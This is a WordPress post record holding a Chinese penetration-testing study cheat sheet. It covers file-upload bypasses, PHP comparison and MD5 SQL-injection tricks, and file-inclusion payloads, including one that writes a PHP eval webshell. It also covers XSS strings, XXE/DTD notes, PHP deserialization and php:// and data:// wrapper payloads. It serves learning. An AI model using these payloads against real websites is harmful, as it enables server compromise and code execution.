{"id":23,"date":"2024-06-07T15:01:16","date_gmt":"2024-06-07T07:01:16","guid":{"rendered":"http:\/\/10.244.0.200:10524\/?p=9"},"modified":"2025-11-28T11:22:50","modified_gmt":"2025-11-28T03:22:50","slug":"yixiejiandandeshentouxuexibiji","status":"publish","type":"post","link":"https:\/\/www.nightying.com\/index.php\/2024\/06\/07\/yixiejiandandeshentouxuexibiji\/","title":{"rendered":"\u4e00\u4e9b\u7b80\u5355\u7684\u6e17\u900f\u5b66\u4e60\u7b14\u8bb0"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>\u6587\u4ef6\u4e0a\u4f20\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>.asp\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>aspx\uff0cashx\uff0cascx\uff0ccer\uff0ccdx\uff0cidc\uff0cida\uff0cidq\uff0cinc\uff0cshtml\uff0cstm\n\n\uff08IIS\u89e3\u6790\u6f0f\u6d1e\uff09\n\n\u5728XX.asp\u6587\u4ef6\u5939\u4e2d\uff0cIIS\u4f1a\u628a\u6587\u4ef6\u5939\u4e2d\u6240\u6709\u5185\u5bb9\u5f53\u4f5casp\u6765\u89e3\u6790<\/strong><\/code><\/pre>\n\n\n\n<p>access\u6570\u636e\u5e93\u5982\u679c\u662fasp\u683c\u5f0f\uff0c\u53ef\u4ee5\u901a\u8fc7\u6570\u636e\u63d2\u5165\u7684\u65b9\u5f0f\u63d2\u5165\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u6bd4\u5982\u201c\u7559\u8a00\u201d<\/p>\n\n\n\n<p>\u6ce8\uff1aurl \u9047\u5230#\u4f1a\u5f53\u4f5c\u7784\u70b9 \u6240\u4ee5\u8981\u5c06\u201c#\u201durl\u7f16\u7801\u540e\u5728\u8fdb\u884c\u8bbf\u95ee<\/p>\n\n\n\n<p>\u63d2\u5165\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u9700\u8981\u8f6c\u8bd1,\u4ee5\u4e0b\u6728\u9a6c\u662f\u5728\u6570\u636e\u5e93\u4e2d\u63d2\u5165\u4f7f\u7528<\/p>\n\n\n\n<p>\u253c\u6520\u6578\u7563\u6574\u7220\u7165\u6575\u7473\u2228\u2261\u2529\u613e \u5bc6\u7801a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u4e00\u53e5\u8bdd\u4f60\u8981\u5199\u5165\u6570\u636e\u5e93\uff0c\u6570\u636e\u5e93\u5fc5\u987b\u662fasp\u683c\u5f0f\u6216\u8005\u6211\u4eec\u80fd\u591f\u901a\u8fc7\u5907\u4efd\u5907\u4efd\u4e3aasp\u683c\u5f0f\u3002\u7528\u5ba2\u6237\u7aef\u8fde\u63a5\u8fd9\u4e2aasp\u7684\u6570\u636e\u5e93\u3002\n\n \n\n\u4e00\u53e5\u8bdd\u5199\u5165\u6587\u4ef6\u3002\u6211\u4eec\u8fde\u63a5\u8fd9\u4e2a\u6587\u4ef6\u3002\u8fd9\u79cd\u60c5\u51b5\u5229\u7528\u8d77\u6765\u5f88\u96be\u3002\u4e00\u822c\u662f\u6211\u4eec\u77e5\u9053\u5bf9\u65b9\u7684\u6e90\u4ee3\u7801\u3002\u901a\u8fc7\u5206\u6790\u5f97\u77e5\u67d0\u4e2a\u529f\u80fd\u5199\u5165\u67d0\u4e2a\u6587\u4ef6\u3002<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>.jsp\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>jsp\uff0cjspx\uff0cjava\uff0cclass\uff0cjar\uff0cwar<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>0e\u7ed5\u8fc7\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>a=QNKCDZO&amp;b=240610708<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>\u6570\u7ec4\u7ed5\u8fc7\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>?a&#91;]=1&amp;b&#91;]=2<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u5728\u5f3a\u6bd4\u8f83=== \u4e2d\n&nbsp;ffifdyop \u5b57\u7b26\u4e32\u7ecf\u8fc7MD5\u52a0\u5bc6\u540e\u4e3a276f722736c95d99e921722cf9ed621c\n&nbsp;\u5728\u8f6c\u6362\u6210\u5b57\u7b26\u4e32\u4e3a\u2019or\u20196\u4e71\u7801\n&nbsp;\u200b\n&nbsp;Select * from \u2019admin\u2019 where password=\u2018or\u20196\u4e71\u7801\n&nbsp;\u76f8\u5f53\u4e8e\u4e07\u80fd\u5bc6\u7801<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>PHP\u7a7a\u683c\u7ed5\u8fc7\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>%20 %09\n\n$IFS$ {IFS}\n\n{cat,flag}<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>PHP\u7981\u7528\u7ed5\u8fc7\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php4\uff0cphtml\uff0cphphpp\uff0cPhp\n\nphp5 php3 php2\n\nphpt pht wphp\n\ninc\/.txt \u5c06PHP\u4ee3\u7801\u4fdd\u5b58\u5728.inc\u6216.txt\u6587\u4ef6\u4e2d\uff0c\u4f7f\u7528.htaccess\u5c06\u8fd9\u4e9b\u6587\u4ef6\u7684MIME\u7c7b\u578b\u8bbe\u7f6e\u4e3aapplication\/x-httpd-php\uff0c\u5c06\u5b83\u4eec\u4f2a\u88c5\u6210\u6709\u6548\u7684PHP\u6587\u4ef6\u3002<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>\u5927\u5c0f\u5199\u7ed5\u8fc7\uff1a<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u66f4\u6539\u5927\u5c0f\u5199\uff08\u8fd9\u4e2a\u57fa\u672c\u4e0a\u9047\u4e0d\u5230\u4e86\uff09<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>content-type\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>1.\u6dfb\u52a0\u7279\u6b8a\u5b57\u7b26\uff1a\n\nContent-Type: image\/jpeg; php\n\n2.\u4fee\u6539\u6587\u4ef6\u540e\u7f00\uff1a\n\n\u9700\u8981\u6587\u4ef6\u5305\u542b\u624d\u80fd\u6267\u884c\n\n3.\u6b3a\u9a97MIME\u7c7b\u578b\uff1a\n\n\u4fee\u6539Content-Type\u5934\u7684\u503c\u4e3a\"image\/jpeg\"\n\n4.\u7a7a\u5b57\u8282\u653b\u51fb\n\nContent-Type: image\/jpeg%00.php\n\n5.Content-Type\u6ce8\u5165\uff1a\n\n\u5728\u6587\u4ef6\u540d\u540e\u9762\u6dfb\u52a0;Content-Type: image\/jpeg\n\n6.content-Dispositon\u7ed5\u8fc7\uff1a\n\n\u901a\u8fc7\u4f2a\u9020Content-Disposition\uff0c\u6765\u6b3a\u9a97\u670d\u52a1\u5668\u4ee5\u4e3a\u4e0a\u4f20\u7684\u662f\u5408\u6cd5\u7c7b\u578b\u7684\u6587\u4ef6\uff0c\u7ed5\u8fc7\u9ed1\u540d\u5355\u9a8c\u8bc1\u3002\n\nContent-Disposition: attachment; filename=\"malware.PDF<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>::$DATA\u7ed5\u8fc7\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u6587\u4ef6\u540d+::$DATA<\/strong><\/code><\/pre>\n\n\n\n<p class=\"has-medium-font-size\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u6587\u4ef6\u4e0a\u4f20\u7684html\u4ee3\u7801\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;body&gt;\n\n&amp;nbsp; &amp;nbsp; &lt;form action=\"\u4e0a\u4f20\u63a5\u53e3URL\" method=\"post\" enctype=\"multipart\/form-data\"&gt;\n\n&amp;nbsp; &amp;nbsp; &lt;input type=\"file\" name=\"file\" \/&gt;\n\n&amp;nbsp; &amp;nbsp; &lt;input type=\"submit\" value=\"upload\" \/&gt;\n\n&amp;nbsp; &amp;nbsp; &lt;\/form&gt;\n\n&lt;\/body&gt;<\/strong><\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\"><strong>\u6587\u4ef6\u5305\u542b\uff1a<\/strong><\/h1>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u672c\u5730\u6587\u4ef6\u5305\u542b\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>\u901a\u8fc7\u62a5\u9519\u6216\u8005\u5176\u4ed6\u9014\u5f84\u627e\u5230\u5f53\u524d\u76ee\u5f55\u7684\u8def\u5f84\uff0c\u901a\u8fc7..\/\u8fdb\u884c\u8de8\u76ee\u5f55\uff0c\u8fdb\u884c\u8bfb\u53d6\u3002\u53ef\u4ee5\u7ed3\u5408\u4e0a\u4f20\u63a5\u53e3\uff0c\u8fdb\u884cwebshell\u8bfb\u53d6<\/strong><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff1a<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u901a\u8fc7\u62a5\u9519\u6216\u8005\u5176\u4ed6\u9014\u5f84\u627e\u5230\u5f53\u524d\u76ee\u5f55\u7684\u8def\u5f84\uff0c\u53ef\u4ee5\u8fdc\u7a0b\u5305\u542bhttp\u7f51\u7ad9\uff0c\u4e5f\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2atxt\u6267\u884c\u5199\u5165shell\uff1a\n&lt;?php fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST&#91;123])?&gt;'); ?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>XSS\u6d4b\u8bd5\u8bed\u53e5<\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;script&gt;alert(1)&lt;\/script&gt;\n\n'&gt;&lt;img src=\"#\" onerror=\"alert(1)\"\/&gt;\n\n' onclick=\"alert('xss')'&gt;\n\n\u4f2a\u534f\u8bae\uff0c\u4e00\u822c\u7528\u5728href\u4e2d\uff1a\n\nJavaScript:alert(\/xss\/)<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>XXE\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u6f0f\u6d1e<\/strong><\/h2>\n\n\n\n<p>\u539f\u7406\uff1a\u670d\u52a1\u5668\u63a5\u53d7\u548c\u89e3\u6790\u4e86\u6765\u81ea\u5ba2\u6237\u7aef\u7684xml\u6570\u636e\uff0c\u4f46\u662f\u6ca1\u6709\u505a\u4e25\u683c\u7684\u5b89\u5168\u63a7\u5236\uff0c\u4ece\u800c\u5bfc\u81f4xml\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u5b9a\u4e49\uff1a<\/strong><\/h3>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>1.\u6587\u6863\u7c7b\u578b\u5b9a\u4e49\uff08Document Type Definition\uff0cDTD\uff09\uff0cXML\u7684\u5e03\u5c40\u8bed\u8a00\n\n2.\u53ef\u6269\u5c55\u7684\u6837\u5f0f\u8bed\u8a00\uff08Extensible Style Language\uff0cXSL\uff09\uff0cXML\u7684\u6837\u5f0f\u8868\u8bed\u8a00\n\n3.\u53ef\u6269\u5c55\u94fe\u63a5\u8bed\u8a00\uff08Extensible Link Language ,XLL\uff09\n\nXML:\u53ef\u6269\u5c55\u6807\u8bb0\u8bed\u8a00\uff0c\u6807\u51c6\u901a\u7528\u6807\u8bb0\u8bed\u8a00\u7684\u5b50\u96c6\uff0c\u662f\u4e00\u79cd\u7528\u4e8e\u6807\u51b5\u7535\u5b50\u6587\u4ef6\u4f7f\u5176\u5177\u6709\u7ed3\u6784\u6027\u7684\u6807\u51b5\u8bed\u8a00\u3002\u5b83\u7684\u8bbe\u8ba1\u5b97\u65e8\u662f\u4f20\u8f93\u6570\u636e\uff0c\u800c\u4e0d\u662f\u663e\u793a\u6570\u636e\u3002\u5b83\u7684\u6807\u7b7e\u6ca1\u6709\u88ab\u9884\u5b9a\u4e49\uff0c\u9700\u8981\u81ea\u884c\u5b9a\u4e49\u6807\u7b7e\u3002<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>XML:<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml.png\" alt=\"\" class=\"wp-image-14\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml\u5b9e\u4f53.png\" alt=\"\" class=\"wp-image-15\"\/><\/figure>\n\n\n\n<p>xml\u6587\u6863\u7ed3\u6784\u5305\u62ecxml\u58f0\u660e\u3001DTD\u6587\u6863\u7c7b\u578b\u5b9a\u4e49\uff08\u53ef\u9009\uff09\u3001\u6587\u6863\u5143\u7d20<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/xml\u683c\u5f0f.png\" alt=\"\" class=\"wp-image-16\"\/><\/figure>\n\n\n\n<p>DTD(\u6587\u6863\u7c7b\u578b\u5b9a\u4e49)\u7528\u4e8e\u5b9a\u4e49\u5f15\u7528\u666e\u901a\u6587\u672c\u6216\u7279\u6b8a\u5b57\u7b26\u7684\u5feb\u6377\u65b9\u5f0f\u7684\u53d8\u91cf\uff0c\u53ef\u4ee5\u5185\u90e8\u58f0\u660e\u6216\u5916\u90e8\u5f15\u7528\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>DTD\u5185\u90e8\uff1a<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/DTD\u5185\u90e8.png\" alt=\"\" class=\"wp-image-17\"\/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>DTD\u5916\u90e8\uff1a<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" src=\"http:\/\/10.244.0.200:10524\/wp-content\/uploads\/2024\/06\/DTD\u5916\u90e8.png\" alt=\"\" class=\"wp-image-18\"\/><\/figure>\n\n\n\n<p>DTD\u58f0\u660e\u5143\u7d20\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>&lt;!ELEMENT \u5143\u7d20\u540d\u79f0 \u7c7b\u522b&gt;\n\u7c7b\u522b\uff1aEMPTY\uff0c(#PCDATA)\uff0c(#CDDATA)\uff0cANY\nPCDATA\uff1a\u4f1a\u88ab\u89e3\u6790\u5668\u89e3\u6790\u7684\u6587\u672c\u3002\u8fd9\u4e9b\u6587\u672c\u5c06\u88ab\u89e3\u6790\u5668\u68c0\u67e5\u5b9e\u4f53\u4ee5\u53ca\u6807\u8bb0\u3002\nCDDATA\uff1a\u4e0d\u4f1a\u88ab\u89e3\u6790\u5668\u89e3\u6790\u7684\u6587\u672c\u3002\n&lt;!ELEMENT \u5143\u7d20\u540d\u79f0 (\u5143\u7d20\u5185\u5bb9)&gt;\n\u591a\u4e2a\u5143\u7d20\u5185\u5bb9\uff1a(\u5b50\u5143\u7d20\u540d\u79f0 1,\u5b50\u5143\u7d20\u540d\u79f0 2,\u2026\u2026)\n\u5143\u7d20\u5185\u5bb9\u6b21\u6570\uff1a\u9ed8\u8ba4\u53ea\u51fa\u73b0\u4e00\u6b21\u3002\n\u6700\u5c11\u51fa\u73b0\u4e00\u4e2a\uff1a(\u5b50\u5143\u7d20\u540d\u79f0+)\n\u51fa\u73b00\u6b21\u6216\u591a\u6b21\uff1a(\u5b50\u5143\u7d20\u540d\u79f0*)\n\u51fa\u73b00\u6b21\u62161\u6b21\uff1a(\u5b50\u5143\u7d20\u540d\u79f0?)\n\u6216\uff1a(message|body)\n\u6df7\u5408\u7c7b\u522b\u548c\u5143\u7d20\u5185\u5bb9\uff1a\n&lt;!ELEMENT note (#PCDATA|to|from|header|message)*&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>DTD\u58f0\u660e\u5c5e\u6027\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u57fa\u672c\u683c\u5f0f\uff1a&lt;!ATTLIST \u5143\u7d20\u540d\u79f0 \u5c5e\u6027\u540d\u79f0 \u5c5e\u6027\u7c7b\u578b \u9ed8\u8ba4\u503c&gt;\n\n\u5c5e\u6027\uff1a\nCDATA \u503c\u4e3a\u5b57\u7b26\u6570\u636e (character data)\n(en1|en2|\u2026) \u6b64\u503c\u662f\u679a\u4e3e\u5217\u8868\u4e2d\u7684\u4e00\u4e2a\u503c\nID \u503c\u4e3a\u552f\u4e00\u7684 id\nIDREF \u503c\u4e3a\u53e6\u5916\u4e00\u4e2a\u5143\u7d20\u7684 id\nIDREFS \u503c\u4e3a\u5176\u4ed6 id \u7684\u5217\u8868\nNMTOKEN \u503c\u4e3a\u5408\u6cd5\u7684 XML \u540d\u79f0\nNMTOKENS \u503c\u4e3a\u5408\u6cd5\u7684 XML \u540d\u79f0\u7684\u5217\u8868\nENTITY \u503c\u662f\u4e00\u4e2a\u5b9e\u4f53\nENTITIES \u503c\u662f\u4e00\u4e2a\u5b9e\u4f53\u5217\u8868\nNOTATION \u6b64\u503c\u662f\u7b26\u53f7\u7684\u540d\u79f0\nxml: \u503c\u662f\u4e00\u4e2a**\u9884\u5b9a\u4e49\u7684 XML \u503c\n\u9ed8\u8ba4\u503c\uff1a\n\u503c \u5c5e\u6027\u7684\u9ed8\u8ba4\u503c\n#REQUIRED \u5c5e\u6027\u503c\u662f\u5fc5\u9700\u7684\n#IMPLIED \u5c5e\u6027\u4e0d\u662f\u5fc5\u9700\u7684\n#FIXED value \u5c5e\u6027\u503c\u662f\u56fa\u5b9a\u7684<\/strong><\/code><\/pre>\n\n\n\n<p>DTD\u58f0\u660e\u5b9e\u4f53\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u547d\u540d\u5b9e\u4f53(\u5185\u90e8\u5b9e\u4f53)\uff1a&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 \"\u5b9e\u4f53\u7684\u503c\"&gt;\n\u5916\u90e8\u5b9e\u4f53\uff1a&lt;!ENTITY \u5b9e\u4f53\u540d\u79f0 SYSTEM \"URI\/URL\"&gt;\n\u53c2\u6570\u5b9e\u4f53\uff1a&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 \"\u5b9e\u4f53\u7684\u503c\"&gt;\uff08\u53ea\u5728DTD\u4e2d\u6709\u6548\uff09\n\u5916\u90e8\u53c2\u6570\u5b9e\u4f53\uff1a&lt;!ENTITY % \u5b9e\u4f53\u540d\u79f0 SYSTEM \"URI\"&gt;\uff08\u53ea\u5728DTD\u4e2d\u6709\u6548\uff09<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP\u53cd\u5e8f\u5217\u5316\uff1a<\/strong><\/h2>\n\n\n\n<p>\u5e8f\u5217\u5316\uff1a\u628a\u4e00\u4e2a\u5bf9\u8c61\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\u6d41\u7684\u5f62\u5f0f<\/p>\n\n\n\n<p>\u53cd\u5e8f\u5217\u5316\uff1a\u628a\u5b57\u7b26\u4e32\u6d41\u8f6c\u6362\u4e3a\u5bf9\u8c61\u7684\u5f62\u5f0f<\/p>\n\n\n\n<p>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a\u6ca1\u6709\u5bf9\u7528\u6237\u7684\u8f93\u5165\u8fdb\u884c\u8fc7\u6ee4\uff0c\u5206\u4e3a\u65e0\u7c7b\u548c\u6709\u7c7b\uff1a<\/p>\n\n\n\n<p>\u65e0\u7c7b\uff1a\u53ef\u4ee5\u63a7\u5236\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\uff0c\u6267\u884cSQL\u6ce8\u5165\u3001\u76ee\u5f55\u904d\u5386\u7b49\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6709\u7c7b\uff1a\u6709\u53ef\u80fd\u89e6\u53d1\u5bf9\u8c61\u4e2d\u7684\u4e00\u4e9b\u9b54\u672f\u65b9\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>O:1:\"S\":1:{s:4:\"test\";s:29:\"&lt;script&gt;alert('xss')&lt;\/script&gt;\";}\n\nO\uff1a\u4ee3\u8868object\n1\uff1a\u4ee3\u8868\u5bf9\u8c61\u957f\u5ea6\n\"S\":\u4ee3\u8868\u5bf9\u8c61\u540d\u79f0\n1\uff1a\u4ee3\u8868\u8be5\u5bf9\u8c61\u4e2d\u53d8\u91cf\u4e2a\u6570\ns\uff1a\u53d8\u91cf\u6570\u636e\u7c7b\u578b\n4\uff1a\u4ee3\u8868\u53d8\u91cf\u540d\u957f\u5ea6\n\"test\"\uff1a\u4ee3\u8868\u53d8\u91cf\u540d\ns:\u4ee3\u8868\u6570\u636e\u7c7b\u578b\n29:\u4ee3\u8868\u53d8\u91cf\u503c\u957f\u5ea6\n\"&lt;script&gt;alert('xss')&lt;\/script&gt;\"\uff1a\u4ee3\u8868\u53d8\u91cf\u503c\uff0c\u540c\u65f6\u4e5f\u662f\u6ce8\u5165\u70b9<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u5e03\u5c14\u578b(bool):b\n\u6574\u6570\u578b(int):i\n\u5b57\u7b26\u4e32\u578b(str):s\n\u6570\u7ec4\u578b(array):a\n\u5bf9\u8c61\u578b(object)\uff1aO\nNULL\u578b\uff1aN<\/strong><\/code><\/pre>\n\n\n\n<p>\u9b54\u672f\u65b9\u6cd5\uff08\u89e6\u53d1\uff09\uff1a<\/p>\n\n\n\n<p>\uff08\u524d\u63d0\uff1a\u6709\u53ef\u5229\u7528\u7684\u7c7b\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>__construct()\t\t\/\/\u521b\u5efa\u5bf9\u8c61\u65f6\u89e6\u53d1\n__destruct()\t\t\/\/\u5bf9\u8c61\u9500\u6bc1\u65f6\u89e6\u53d1\n__call()\t\/\/\u5728\u5bf9\u8c61\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__callStatic()\t\/\/\u5728\u9759\u6001\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__get()\t\t\/\/\u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e\n__set()\t\t\/\/\u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\n__isset()\/\/\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()empty()\u89e6\u53d1\n__unset()\t\/\/\u5728\u4e0d\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u89e6\u53d1\n__invoke()\t\/\/\u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1\n__wakeup()\t\/\/\u6267\u884cunserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\n__sleep()\t\/\/\u6267\u884cserialize()\u65f6\uff0c\u5148\u4f1a\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>PHP\u4f2a\u534f\u8bae\uff1a<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">include()\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b:<\/h3>\n\n\n\n<p>\u5982\u679c\u6587\u4ef6\u662f\u975ephp\u6587\u4ef6\uff0c\u5219\u4f9d\u65e7\u4f7f\u7528php\u8bed\u6cd5\u89e3\u6790<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>file:\/\/\u534f\u8bae<\/strong><\/h4>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>1.file:\/\/&#91;\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84\u548c\u6587\u4ef6\u540d]\n\n2.&#91;\u6587\u4ef6\u7684\u76f8\u5bf9\u8def\u5f84\u548c\u6587\u4ef6\u540d]\n\n3.&#91;http\uff1a\/\/\u7f51\u7edc\u8def\u5f84\u548c\u6587\u4ef6\u540d]<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>php:\/\/\u534f\u8bae<\/strong><\/h4>\n\n\n\n<p>php:\/\/input\u6267\u884cphp<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php:\/\/input + &#91;POST DATA]\n&lt;?php system('ls')?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>php:\/\/filter\u8bfb\u53d6\u6e90\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>php:\/\/filter\/read=convert.base64-encode\/resource=&#91;\u6587\u4ef6\u540d]<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>zip:\/\/ bzip2:\/\/ zlib:\/\/\u534f\u8bae<\/strong><\/h4>\n\n\n\n<p>1.zip:\/\/[\u538b\u7f29\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84]#[\u538b\u7f29\u6587\u4ef6\u5185\u7684\u5b50\u6587\u4ef6\u540d]<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u538b\u7f29 phpinfo.txt \u4e3a phpinfo.zip \uff0c\u538b\u7f29\u5305\u91cd\u547d\u540d\u4e3a phpinfo.jpg \uff0c\u5e76\u4e0a\u4f20\nhttp:\/\/127.0.0.1\/include.php?file=zip:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.jpg%23phpinfo.txt<\/strong><\/code><\/pre>\n\n\n\n<p>2.compress.bzip2:\/\/file.bz2<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u538b\u7f29 phpinfo.txt \u4e3a phpinfo.bz2 \u5e76\u4e0a\u4f20\uff08\u540c\u6837\u652f\u6301\u4efb\u610f\u540e\u7f00\u540d\uff09\nhttp:\/\/127.0.0.1\/include.php?file=compress.bzip2:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.bz2<\/strong><\/code><\/pre>\n\n\n\n<p>3.compress.zlib:\/\/file.gz<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>\u538b\u7f29 phpinfo.txt \u4e3a phpinfo.gz \u5e76\u4e0a\u4f20\uff08\u540c\u6837\u652f\u6301\u4efb\u610f\u540e\u7f00\u540d\uff09\nhttp:\/\/127.0.0.1\/include.php?file=compress.zlib:\/\/E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.gz<\/strong><\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>data:\/\/\u534f\u8bae<\/strong><\/h4>\n\n\n\n<p>1.data:\/\/text\/plain,<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain,&lt;?php%20phpinfo();?&gt;<\/strong><\/code><\/pre>\n\n\n\n<p>2.data:\/\/text\/plain;base64,<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code><strong>http:\/\/127.0.0.1\/include.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h2 